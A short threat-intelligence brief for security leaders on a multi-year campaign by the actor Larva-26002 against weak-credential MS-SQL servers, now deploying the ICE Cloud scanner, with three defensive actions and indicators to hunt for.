Threat Actors Continuously Attacking MS-SQL Servers to Deploy ICE Cloud Scanner

What happened

Threat actors continuously attacking MS-SQL servers are deploying ICE Cloud Scanner in a campaign tied to the threat actor Larva-26002. The activity has been ongoing since at least January 2024 and continued into 2026, with the attacker changing tools over time. In 2024, the group deployed Trigona and Mimic ransomware on internet-exposed MS-SQL servers with weak credentials. In 2025, it added Teramind and used a scanner written in Rust. In the 2026 activity, ASEC identified attacks in which the same actor compromised the same MS-SQL servers and deployed ICE Cloud, a scanner written in Go. The attacks begin with brute force or dictionary attacks against exposed servers, after which the attacker uses the BCP utility or PowerShell with Curl or Bitsadmin to place malware on compromised hosts. 

Who is affected

The direct exposure affects internet-facing MS-SQL servers with weak credentials and poor password hygiene. The article also describes compromised servers being used to scan other MS-SQL addresses with credential pairs supplied by the attacker’s command-and-control server, creating additional potential exposure for other database systems. 

Why CISOs should care

This incident involves repeated compromise of the same MS-SQL servers across multiple years, with the tooling shifting from ransomware deployment to scanner malware. For CISOs, the business and operational relevance is that compromised database servers are being used to probe other database assets and return successful access results to the attacker’s command-and-control infrastructure. 

3 practical actions:

1. Identify exposed database assets: Confirm which internet-facing MS-SQL servers in your environment have weak password exposure or poor access controls consistent with the intrusion path described in the incident. 
2. Investigate the specific execution chain: Review affected systems for use of the BCP utility, PowerShell activity involving Curl or Bitsadmin, the table uGnzBdZbsi, the formatting file FODsOZKgAU.txt, and the file api.exe in C:\ProgramData\. 
3. Trace outbound scanner activity: Hunt for connections from compromised hosts to command-and-control infrastructure and for signs that ICE Cloud Client received MS-SQL target lists, credential pairs, and tasking from the server. 

For more coverage of major incidents and threat activity, explore our reporting on Cyberattacks.